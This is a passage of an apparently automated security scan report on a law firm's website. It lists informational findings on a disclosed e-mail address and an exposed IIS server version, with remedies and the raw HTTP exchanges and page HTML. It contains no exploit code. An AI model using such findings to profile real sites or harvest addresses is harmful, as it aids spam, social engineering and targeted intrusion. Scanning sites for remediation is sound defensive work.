Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65


/services/industry_detail.aspx application debugging not enabled.
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /services/otherservice_detail.aspx

/services/otherservice_detail.aspx

http://www.foley.com/services/otherservice_detail.aspx?serviceid=6

Found E-mails

KnowledgeGate@foley.com

Request

GET /services/otherservice_detail.aspx?serviceid=6 HTTP/1.1
Referer: http://www.foley.com/services/services.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Cookie: ASP.NET_SessionId=4attkau5xs2c1m55gdgxmq3w
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 15 Apr 2011 21:31:20 GMT
X-Powered-By: ASP.NET
x-prodtype: 01
x-client: 000425
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19771



<HTML>
<HEAD>
<title>
Foley & Lardner LLP - Our Services - KnowledgeGate™
</title>
<meta content="KnowledgeGate Controlling costsProtecting interestsMinimizing risks" name=description>
<meta content="" name=keywords>
<LINK href="/include/main.css" type="text/css" rel="stylesheet"></LINK>
<script src="/include/mouseover.js"></script>
<script src="/include/main.js"></script>
</HEAD>
<body vLink="#7e2907" leftMargin="0" background="/img/bg.gif" topMargin="0" marginwidth="0" marginheight="0">
<!-- HEADER BEGIN -->

<!---------Header----------->

<script src="../include/imgpopup.js"></script>
<center>
<style>
body {margin-top:42px;}
</style>
<table border="0" cellpadding="0" cellspacing="0">
<tr valign="top">
<td><img src="/img/spacer.gif" width="16" height="39" border="0" alt=""><br>
<img src="/img/arrow_left2.gif" width="16" height="282" border="0" alt=""></td>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td bgcolor="#ffffff">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td><a href="/home.aspx"><img src="/img/logo_foley_lardner.gif" border="0" alt="Foley &amp; Lardner LLP"></a></td>
<td align="right"><img src="/img/spacer.gif" width="17" height="8" border="0" alt=""><br>
<img src="/img/toolbar/l_toolbar.gif" width="81" height="16" border="0" alt="Toolbar" name="toolbar"><a href="/sitesearch.aspx"><img src="/img/toolbar/i_search.gif" width="17" height="13" border="0" alt="Search" onMouseOut="changeImg('search','i_search');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('search','io_search');changeImg('toolbar','l_search');" name="search"></a><a href="javascript:popup_external('http%3a%2f%2fwww.foley.com%2fservices%2fotherservice_detail.aspx%3fserviceid%3d6%26print%3dtrue');"><img src="/img/toolbar/i_print.gif" width="17" height="13" border="0" alt="Print" onMouseOut="changeImg('print','i_print');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('print','io_print');changeImg('toolbar','l_print');" name="print"></a><a href="javascript:popup_external_emailfriend('/admin/emailfriend.aspx?link=http%3a%2f%2fwww.foley.com%2fservices%2fotherservice_detail.aspx%3fserviceid%3d6%5eemail%3dtrue');"><img src="/img/toolbar/i_email.gif" width="17" height="13" border="0" alt="Email this Page" onMouseOut="changeImg('email','i_email');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('email','io_email');changeImg('toolbar','l_email');" name="email"></a><a href="/briefcase/savepage.aspx?name=Our+Services+-+KnowledgeGate%e2%84%a2&url=http%3a%2f%2fwww.foley.com%2fservices%2fotherservice_detail.aspx%3fserviceid%3d6"><img src="/img/toolbar/i_save.gif" width="17" height="13" border="0" alt="Save" onMouseOut="changeImg('save','i_save');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('save','io_save');changeImg('toolbar','l_save');" name="save"></a><a href="/help.aspx"><img src="/img/toolbar/i_help.gif" width="17" height="13" border="0" alt="Help" onMouseOut="changeImg('help','i_help');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('help','io_help');changeImg('toolbar','l_help');" name="help"></a><img src="/img/spacer.gif" width="4" height="13" border="0" alt=""><br>
</td>
</tr>
<!---------END Header----------->
<!---------Page Header----------->
<tr valign="top">
<td colspan="2">
<!-- Flash Nav -->
<script language ="javascript">
if(blnIsMacIE){

document.write('')
} else {

document.write('')
}


if ( !blnHasFlash ) {

document.write('<div style="POSITION:absolute;width:748px;TOP:140px;">');


document.write('<img src="/img/nav/main.gif" width=748 height=20 border=0 alt="" usemap="#main"><br>');
document.write('<img src="/img/nav/services.gif" width=748 height=20 border=0 alt="" usemap="#Services">');


document.write('</div>');

}
else
{
var flashstring = "";

flashstring = flashstring + "<div style=\"POSITION:absolute;width:748px;TOP:119px;\"><OBJECT codeBase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0\" height=\"100\" width=\"748\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" VIEWASTEXT><PARAM NAME=\"_cx\" VALUE=\"19791\">";
flashstring = flashstring + "<PARAM NAME=\"_cy\" VALUE=\"1111\">";
flashstring = flashstring + "<PARAM NAME=\"FlashVars\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Movie\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"Src\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"WMode\" VALUE=\"Transparent\">";
flashstring = flashstring + "<PARAM NAME=\"Play\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Loop\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Quality\" VALUE=\"High\">";
flashstring = flashstring + "<PARAM NAME=\"SAlign\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Menu\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Base\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"AllowScriptAccess\" VALUE=\"always\">";
flashstring = flashstring + "<PARAM NAME=\"Scale\" VALUE=\"ShowAll\">";
flashstring = flashstring + "<PARAM NAME=\"DeviceFont\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"EmbedMovie\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"BGColor\" VALUE=\"FFFFFF\">";
flashstring = flashstring + "<PARAM NAME=\"SWRemote\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"MovieData\" VALUE=\"\">";
flashstring = flashstring + "<param name=\"width\" value=\"748\">";
flashstring = flashstring + "<param name=\"height\" value=\"100\">";
flashstring = flashstring + "<EMBED src=\"/nav_interior.swf?top=services\" quality=\"high\" wmode=\"transparent\" bgcolor=\"#FFFFFF\" WIDTH=\"748\" HEIGHT=\"100\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\"></EMBED></OBJECT></div>";

document.write('<script src="/include/control.js"></scr');
document.write('ipt>');
}
</script><!-- END Flash Nav --><img src="/img/nav_bg.gif" width="748" height="20" border="0" alt=""><br>
<img src="/img/spacer.gif" width="1" height="1" border="0" alt=""><br>
<img src="/files/tbl_s86RelatedServices/HeadingImage625/6/knowgate.jpg" width="748" height="82" border="0" alt="KnowledgeGate™"></td>
</tr>
<!---------END Page Header----------->
<!---------Middle Section----------->
<tr valign="top">
<td bgcolor="#c1c8cd" colspan="2"><table border="0" cellpadding="0" cellspacing="1">
<tr valign="top">
<td class="mainbody" align="middle" colspan="3">
<table border="0" cellpadding="0" cellspacing="0" width="746">
<!-- -->

<!-- -->
<tr valign="top">
<td class="body" background="/img/arrow_bg1.gif" style="BACKGROUND-REPEAT:no-repeat" width="30"><img src="/img/spacer.gif" width="30" height="304" border="0" alt=""></td>
<td class="body" background="/img/arrow_bg2.gif" style="BACKGROUND-REPEAT:no-repeat" width="716">
<!-- -->

<br>
<br>

<!-- HEADER END -->
<!-- BODY CONTENT BEGIN -->



<span id="lblContent">Now Foley offers a powerful combination of its experience and best practice approaches for technology acquisition and implementation transactions. The knowledge bases and tools provided through KnowledgeGate™ are designed to assist companies in effectively controlling costs, protecting their interests, and minimizing the risks inherent of such transactions.<p class="MarketingHeader"><strong>Put the Technology Know-How of Our Attorneys Right on Your Desktop<br /></strong>KnowledgeGate™ is a unique Web-based resource that simplifies the task of implementing and managing enterprise-wide technology systems by:<ul><li><div class="MarketingBullets">Aggregating content on technology issues from Foley attorneys practicing in the field</div></li><li><div class="MarketingBullets">Offering practical advice on common issues (e.g., “Key Enterprise Resource Planning Agreement Issues,” “Legal and Business Risks of<br />e-Mail in the Workplace”)</div></li><li><div class="MarketingBullets">Providing links to content-specific experts</div></li><li><div class="MarketingBullets">Offering topic-related FAQs</div></li></ul><p class="MarketingBodyCopy">In addition, this premium content site provides secure Web access to several proprietary tools developed exclusively by Foley, including:<ul><li><div class="MarketingBullets">Foley's best practice agreement templates for key technology transactions such as software licensing, outsourcing, and professional services</div></li><li><div class="MarketingBullets">Plain English annotations to the template agreements that highlight critical business issues and provide insights into negotiation strategy</div></li><li><div class="MarketingBullets">Use Notes — Identify business issues that provisions are designed to address</div></li><li><div class="MarketingBullets">Negotiation Commentary — Practical insights gathered from assisting hundreds of clients in thousands of transactions</div></li><li><div class="MarketingBullets">Technology Agreement Management Tool — Tracks key information on technology agreements throughout the enterprise and assists in managing agreements, educating your business team on critical issues, retrieving agreements and amendments, and mitigating risks</div></li><li><div class="MarketingBullets">Risk Assessment Tool — Assists in quantifying enterprise risk presented by software license agreements</div></li><li><div class="MarketingBullets">Online Negotiation Assistant — An annotated version of a standard vendor software license agreement designed to provide a context-based discussion of relevant business issues and recommended language for use in the modification of such an agreement</div></li></ul><p class="MarketingHeader"><strong>Minimize the Risks Tied to Technology<br /></strong>With KnowledgeGate™, you have an information technology advisor right at your side. Tap our innovative business resources to:<ul><li><div class="MarketingBullets">Identify the “hidden costs” of technology generally missed in negotiations</div></li><li><div class="MarketingBullets">Highlight business exposure areas and provide mitigation recommendations</div></li><li><div class="MarketingBullets">Utilize tools to manage and minimize vendor-caused project delays and cost overruns</div></li></ul><p class="MarketingBodyCopy">To learn more about KnowledgeGate™ or to request an online presentation, contact us at KnowledgeGate@foley.com or 1.888.453.6539.<br><br><img src="/img/spacer.gif" width=1 height=18></span>
<!-- BODY CONTENT END -->
<!-- SEPARATOR BEGIN -->

<br><br>

</td>
<td class="rightside" width="235"><br>

<!-- SEPARATOR END -->
<!-- RIGHT-SIDE CONTENT BEGIN -->
<span id="lblHighlight"></span>
<span id="lblRelatedContacts"></span>
<span id="lblRelatedNews"><div class=margin><img vspace=6 src="/img/title/news.gif" width=185 height=25 border=0 alt="News"></div><table class="relatedinfo"><tr><td class=icon></td><td><a href="/news/news_results.aspx?SearchType=NEWS&serviceID=6"><img src="/img/b_relatednews.gif" alt="Related News" border=0></a><br><br></td></tr></table></div></span>
<span id="lblRelatedEvents"><div class=margin><img vspace=6 src="/img/title/events.gif" width=185 height=25 border=0 alt="Events"><br><table border=0 cellpadding=0 cellspacing=0><tr valign=top><td class=body><a href="/news/news_results.aspx?SearchType=EVENTS&serviceID=6"><img src="/img/b_relatedevents.gif" alt="Related Events and Recaps" border=0></a><br><br></td></tr></table></div></span>
<span id="lblRelatedPubs"><div class=margin><img vspace=6 src="/img/title/publications.gif" width=185 height=25 border=0 alt="Publications"></div><table class="relatedinfo"><tr><td class=icon></td><td><a href="/publications/pub_results.aspx?serviceID=6"><img src="/img/b_relatedpubs.gif" alt="Related Publications" border=0></a><br></td></tr></table><br></div></span>



<span id="lblRelatedMultimedia">
<div class="margin"><img vspace="6" src="/img/title/multimedia.gif" width="185" height="25" border="0" alt="Multimedia"></div>
<table class="relatedinfo">

<tr>
<td class="icon">
<img id="Multimedialist1_multimediaServiceRepeater__ctl1_imIcon" src="/img/multimedia/i_video.gif" alt="" border="0" />
</td>
<td>
<a href="javascript:void(0);" id="link" onclick="window.open('/multimedia/multimedia_detail.aspx?multimediaid=42329924','flash_player','height=600,width=790').focus();" id="">Outsourcing – The Web Conference Series for Corporate Counsel (56:15)</a><br><br>
</td>
</tr>

<tr>
<td class="icon">
<img id="Multimedialist1_multimediaServiceRepeater__ctl2_imIcon" src="/img/multimedia/i_video.gif" alt="" border="0" />
</td>
<td>
<a href="javascript:void(0);" id="link" onclick="window.open('/multimedia/multimedia_detail.aspx?multimediaid=49230024','flash_player','height=600,width=790').focus();" id="">Technology Trends (01:01:28)</a><br><br>
</td>
</tr>

</table>

<br></span>


<span id="lblRelatedCaseStudies"></span>

<br>
<IMG alt="" src="/img/spacer.gif" width="185" height="25" border="0">
<!-- RIGHT-SIDE CONTENT END -->
<!-- FOOTER BEGIN -->

<br>
</td></tr><..
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /services/industry_detail.aspx

/services/industry_detail.aspx

http://www.foley.com/services/industry_detail.aspx?industryid=19

Extracted Version

Microsoft-IIS/5.0

Request

GET /services/industry_detail.aspx?industryid=19 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.foley.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 15 Apr 2011 21:31:17 GMT
X-Powered-By: ASP.NET
x-prodtype: 01
x-client: 000425
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=uvtk3c55520wvbul3cwhz4ad; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26804



<HTML>
<HEAD>
<title>
Foley & Lardner LLP - Our Services - Energy Industry
</title>
<meta content="Foley & Lardner LLP brings solutions to the varied participants in the electric and gas industries. Our experience with the industry dates to its origin and has continued through every stage of development. We continue to have the capability to meet all of the increasingly varied legal needs of our energy sector clients." name=description>
<meta content="Solutions Foley delivers to the energy industry are comprehensive. They include experiences ranging from developing the processes that created the applicable regulations (and deregulations) in different jurisdictions; to the provision of legal services for all phases of business within the traditional, vertically integrated utility; to the development of the wide array of sophisticated financing, tax, fuel, siting, land use, joint ventures, and intellectual property tools required to serve regulated and unregulated industry participants in this increasingly competitive market. Due to the scale and size of the industry, Foley delivers a full range of legal services to the many publicly traded clients involved with the industry.In addition to the regulated service providers, these participants include energy service companies rolling up service companies through acquisition programs; greenfield GenCo developers; GenCo's participating in facility auctions or carve-outs to roll up substantial generating assets; industry players using project finance and other non-recourse financing techniques to support ESCO and GENCO activities; participants requiring the development and implementation of securitization solutions; and clients needing various innovative corporate structurings or restructurings to better meet business objectives in the Public Utility Holding Company Act, tax, state regulatory and corporate law thicket in which this industry operates. Foley provides these solutions to producers and users of energy products, and to the financial participants in the energy industry.In recent years, Foley has undertaken nearly 30 energy company public financings involving debentures, mortgage bonds, preferred stock and common stock, and been involved in six mergers of publicly traded participants.In addition to its project finance work throughout the country, Foley has recently played a key role with electric utilities in applying the principles of asset securitization to the energy industry. In 1998, Foley served as co-counsel to Commonwealth Edison of Illinois in a $3.4 billion asset-backed securities offering that was the country's largest such offering that year. The AAA-rated securities have played a significant role in balance sheet stabilization for the utility during its transition to free-market conditions." name=keywords>
<LINK href="/include/main.css" type="text/css" rel="stylesheet"></LINK>
<script src="/include/mouseover.js"></script>
<script src="/include/main.js"></script>
</HEAD>
<body vLink="#7e2907" leftMargin="0" background="/img/bg.gif" topMargin="0" marginwidth="0" marginheight="0">
<!-- HEADER BEGIN -->

<!---------Header----------->

<script src="../include/imgpopup.js"></script>
<center>
<style>
body {margin-top:42px;}
</style>
<table border="0" cellpadding="0" cellspacing="0">
<tr valign="top">
<td><img src="/img/spacer.gif" width="16" height="39" border="0" alt=""><br>
<img src="/img/arrow_left2.gif" width="16" height="282" border="0" alt=""></td>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td bgcolor="#ffffff">
<table border="0" cellpadding="0" cellspacing="1" width="750">
<tr valign="top">
<td><a href="/home.aspx"><img src="/img/logo_foley_lardner.gif" border="0" alt="Foley &amp; Lardner LLP"></a></td>
<td align="right"><img src="/img/spacer.gif" width="17" height="8" border="0" alt=""><br>
<img src="/img/toolbar/l_toolbar.gif" width="81" height="16" border="0" alt="Toolbar" name="toolbar"><a href="/sitesearch.aspx"><img src="/img/toolbar/i_search.gif" width="17" height="13" border="0" alt="Search" onMouseOut="changeImg('search','i_search');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('search','io_search');changeImg('toolbar','l_search');" name="search"></a><a href="javascript:popup_external('http%3a%2f%2fwww.foley.com%2fservices%2findustry_detail.aspx%3findustryid%3d19%26print%3dtrue');"><img src="/img/toolbar/i_print.gif" width="17" height="13" border="0" alt="Print" onMouseOut="changeImg('print','i_print');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('print','io_print');changeImg('toolbar','l_print');" name="print"></a><a href="javascript:popup_external_emailfriend('/admin/emailfriend.aspx?link=http%3a%2f%2fwww.foley.com%2fservices%2findustry_detail.aspx%3findustryid%3d19%5eemail%3dtrue');"><img src="/img/toolbar/i_email.gif" width="17" height="13" border="0" alt="Email this Page" onMouseOut="changeImg('email','i_email');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('email','io_email');changeImg('toolbar','l_email');" name="email"></a><a href="/briefcase/savepage.aspx?name=Our+Services+-+Energy+Industry&url=http%3a%2f%2fwww.foley.com%2fservices%2findustry_detail.aspx%3findustryid%3d19"><img src="/img/toolbar/i_save.gif" width="17" height="13" border="0" alt="Save" onMouseOut="changeImg('save','i_save');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('save','io_save');changeImg('toolbar','l_save');" name="save"></a><a href="/help.aspx"><img src="/img/toolbar/i_help.gif" width="17" height="13" border="0" alt="Help" onMouseOut="changeImg('help','i_help');changeImg('toolbar','l_toolbar');" onMouseOver="changeImg('help','io_help');changeImg('toolbar','l_help');" name="help"></a><img src="/img/spacer.gif" width="4" height="13" border="0" alt=""><br>
</td>
</tr>
<!---------END Header----------->
<!---------Page Header----------->
<tr valign="top">
<td colspan="2">
<!-- Flash Nav -->
<script language ="javascript">
if(blnIsMacIE){

document.write('')
} else {

document.write('')
}


if ( !blnHasFlash ) {

document.write('<div style="POSITION:absolute;width:748px;TOP:140px;">');


document.write('<img src="/img/nav/main.gif" width=748 height=20 border=0 alt="" usemap="#main"><br>');
document.write('<img src="/img/nav/services.gif" width=748 height=20 border=0 alt="" usemap="#Services">');


document.write('</div>');

}
else
{
var flashstring = "";

flashstring = flashstring + "<div style=\"POSITION:absolute;width:748px;TOP:119px;\"><OBJECT codeBase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0\" height=\"100\" width=\"748\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" VIEWASTEXT><PARAM NAME=\"_cx\" VALUE=\"19791\">";
flashstring = flashstring + "<PARAM NAME=\"_cy\" VALUE=\"1111\">";
flashstring = flashstring + "<PARAM NAME=\"FlashVars\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Movie\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"Src\" VALUE=\"/nav_interior.swf?top=services\">";
flashstring = flashstring + "<PARAM NAME=\"WMode\" VALUE=\"Transparent\">";
flashstring = flashstring + "<PARAM NAME=\"Play\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Loop\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Quality\" VALUE=\"High\">";
flashstring = flashstring + "<PARAM NAME=\"SAlign\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"Menu\" VALUE=\"-1\">";
flashstring = flashstring + "<PARAM NAME=\"Base\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"AllowScriptAccess\" VALUE=\"always\">";
flashstring = flashstring + "<PARAM NAME=\"Scale\" VALUE=\"ShowAll\">";
flashstring = flashstring + "<PARAM NAME=\"DeviceFont\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"EmbedMovie\" VALUE=\"0\">";
flashstring = flashstring + "<PARAM NAME=\"BGColor\" VALUE=\"FFFFFF\">";
flashstring = flashstring + "<PARAM NAME=\"SWRemote\" VALUE=\"\">";
flashstring = flashstring + "<PARAM NAME=\"MovieData\" VALUE=\"\">";
flashstring = flashstring + "<param name=\"width\" value=\"748\">";
flashstring = flashstring + "<param name=\"height\" value=\"100\">";
flashstring = flashstring + "<EMBED src=\"/nav_interior.swf?top=services\" quality=\"high\" wmode=\"transparent\" bgcolor=\"#FFFFFF\" WIDTH=\"748\" HEIGHT=\"100\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\"></EMBED></OBJECT></div>";

document.write('<script src="/include/control.js"></scr');
document.write('ipt>');
}
</script><!-- END Flash Nav --><img src="/img/nav_bg.gif" width="748" height="20" border="0" alt=""><br>
<img src="/img/spacer.gif" width="1" height="1" border="0" alt=""><br>
<img src="/files/tbl_s7Industries/HeaderImage324/19/enrgy.jpg" width="748" height="82" border="0" alt="Energy Industry"></td>
</tr>
<!---------END Page Header----------->
<!---------Middle Section----------->
<tr valign="top">
<td bgcolor="#c1c8cd" colspan="2"><table border="0" cellpadding="0" cellspacing="1">
<tr valign="top">
<td class="mainbody" align="middle" colspan="3">
<table border="0" cellpadding="0" cellspacing="0" width="746">
<!-- -->

<!-- -->
<tr valign="top">
<td class="body" background="/img/arrow_bg1.gif" style="BACKGROUND-REPEAT:no-repeat" width="30"><img src="/img/spacer.gif" width="30" height="304" border="0" alt=""></td>
<td class="body" background="/img/arrow_bg2.gif" style="BACKGROUND-REPEAT:no-repeat" width="716">
<!-- -->

<br>
<br>

<!-- HEADER END -->
<!-- BODY CONTENT BEGIN -->



<span id="lblContent">From public company mergers and acquisitions to divesture auctions, securities offerings, compliance issues, and litigation, the Energy Industry Team <a id="linkTE" href="http://www.foley.com/people/people_results.aspx?industryID=19">attorneys</a> at Foley helps clients achieve their goals. Whether working with a client whose core business is energy or handling non-core projects that involve some facet of the industry, Foley's experienced attorneys are key strategic partners from due diligence, negotiation, and regulatory approval, to closing. Through our <a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000034354824">project management and budgeting capabilities</a>, we help clients maintain control of their projects and the associated expenses.

<p class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033266224">View a list of representative energy transactions</a>.

<p class="MarketingBodyCopy"><span class="159080721-05122006"><a id="linkTE" href="http://www.foley.com/files/Energy_Industry_Deals.pdf" target="_blank">View a map highlighting states where we have completed energy deals</a>.</span>

<p class="MarketingBodyCopy">Areas where we regularly assist our clients include:

<ul>
<li>
<div class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269324">Corporate and Business Transactions</a></div>
</li>

<li>
<div class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269524">Investigations and Litigation</a></div>
</li>

<li>
<div class="MarketingBodyCopy"><span class="880423218-20032007"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269624">Federal, State and Local Government Regulations and Public Policy</a></span></div>
</li>

<li>
<div class="MarketingBodyCopy"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269724">Energy Facility Development</a></div>
</li>

<li>
<div class="MarketingBodyCopy"><span class="030273516-22032007"><a id="linkTE" href="http://www.foley.com/about/genpage.aspx?genpageid=000033269724&fulldesc=1">Renewables</a></span></div>
</li>
</ul>
<br><br><img src="/img/spacer.gif" width=1 height=18></span>
<!-- BODY CONTENT END -->
<!-- SEPARATOR BEGIN -->

<br><br>

</td>
<td class="rightside" width="235"><br>

<!-- SEPARATOR END -->
<!-- RIGHT-SIDE CONTENT BEGIN -->
<span id="lblHighlight"><div class=margin><img vspace=6 src="/img/title/highlights.gif" width=185 height=25 border=0 alt="Highlights"><br><table border=0 cellpadding=0 cellspacing=0 width=90%><tr valign=top><td class=body><script language ="javascript">
if ( !blnHasFlash )
{

}
else
{
var flashstring = '';

flashstring = flashstring + '<OBJECT codeBase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" height="107" width="178" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" VIEWASTEXT>';
flashstring = flashstring + '<PARAM NAME="Movie" VALUE="/files/tbl_s84Highlights/FileUpload562/331/energy.swf">';
flashstring = flashstring + '<PARAM NAME="Src" VALUE="/files/tbl_s84Highlights/FileUpload562/331/energy.swf">';
flashstring = flashstring + '<PARAM NAME="WMode" VALUE="Transparent">';
flashstring = flashstring + '<PARAM NAME="Quality" VALUE="High">';
flashstring = flashstring + '<PARAM NAME="SAlign" VALUE="">';
flashstring = flashstring + '<PARAM NAME="Menu" VALUE="-1">';
flashstring = flashstring + '<PARAM NAME="Base" VALUE="">';
flashstring = flashstring + '<PARAM NAME="AllowScriptAccess" VALUE="always">';
flashstring = flashstring + '<PARAM NAME="Scale" VALUE="ShowAll">';
flashstring = flashstring + '<PARAM NAME="DeviceFont" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="EmbedMovie" VALUE="0">';
flashstring = flashstring + '<PARAM NAME="BGColor" VALUE="FFFFFF">';
flashstring = flashstring + '<PARAM NAME="SWRemote" VALUE="">';
flashstring = flashstring + '<param name="Width" value="178">';
flashstring = flashstring + '<param..